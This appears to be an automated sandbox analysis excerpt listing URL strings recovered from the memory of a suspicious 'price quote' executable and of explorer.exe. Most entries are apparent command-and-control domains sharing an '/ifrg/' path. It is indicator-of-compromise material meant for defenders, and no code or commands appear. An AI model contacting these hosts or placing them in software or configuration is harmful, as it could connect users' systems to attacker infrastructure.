Source: explorer.exe, 00000010.00000003.3084418132.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3081820013.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.00000000087BB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000010.00000003.3084418132.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3081820013.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.00000000087BB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000010.00000002.3883360063.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.1536745748.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.3899764247.00000000082D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000010.00000000.1544349922.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micros
Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 00000001.00000002.1497547204.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, ySqETqNvdTbE.exe, 0000000B.00000002.1554658117.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.75241.shop
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.75241.shop/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.75241.shop/ifrg/www.theavenuclinic.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.75241.shopReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivenode.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivenode.com/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivenode.com/ifrg/www.75241.shop
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alivenode.comReferer:
Source: explorer.exe, 00000010.00000003.3083086936.00000000085DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3899996423.00000000085E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291121734.00000000085E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3899916237.00000000085DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537572614.00000000085D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bezobotnation.net
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bezobotnation.net/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bezobotnation.net/ifrg/www.boat-insurance-today.world
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bezobotnation.netReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.boat-insurance-today.world
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.boat-insurance-today.world/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.boat-insurance-today.world/ifrg/www.transporteturisticofradan.space
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.boat-insurance-today.worldReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dewdrop.store
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dewdrop.store/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dewdrop.store/ifrg/www.vespeciative.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dewdrop.storeReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecodfairs.top
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecodfairs.top/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecodfairs.top/ifrg/www.bezobotnation.net
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecodfairs.topReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gdminsheng.icu
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gdminsheng.icu/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gdminsheng.icu/ifrg/www.dewdrop.store
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gdminsheng.icuReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mndhhy.store
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mndhhy.store/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mndhhy.store/ifrg/www.stakehs.fun
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mndhhy.storeReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oliverstamatatos.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oliverstamatatos.com/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oliverstamatatos.com/ifrg/www.zysport.net
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oliverstamatatos.comReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.skatingisamazing.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.skatingisamazing.com/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.skatingisamazing.com/ifrg/www.tasteitmakeit.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.skatingisamazing.comReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stakehs.fun
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stakehs.fun/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stakehs.fun/ifrg/www.oliverstamatatos.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.stakehs.funReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tasteitmakeit.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tasteitmakeit.com/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tasteitmakeit.com/ifrg/www.mndhhy.store
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tasteitmakeit.comReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theavenuclinic.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theavenuclinic.com/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theavenuclinic.com/ifrg/www.ecodfairs.top
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theavenuclinic.comReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.transporteturisticofradan.space
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.transporteturisticofradan.space/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.transporteturisticofradan.space/ifrg/www.gdminsheng.icu
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.transporteturisticofradan.spaceReferer:
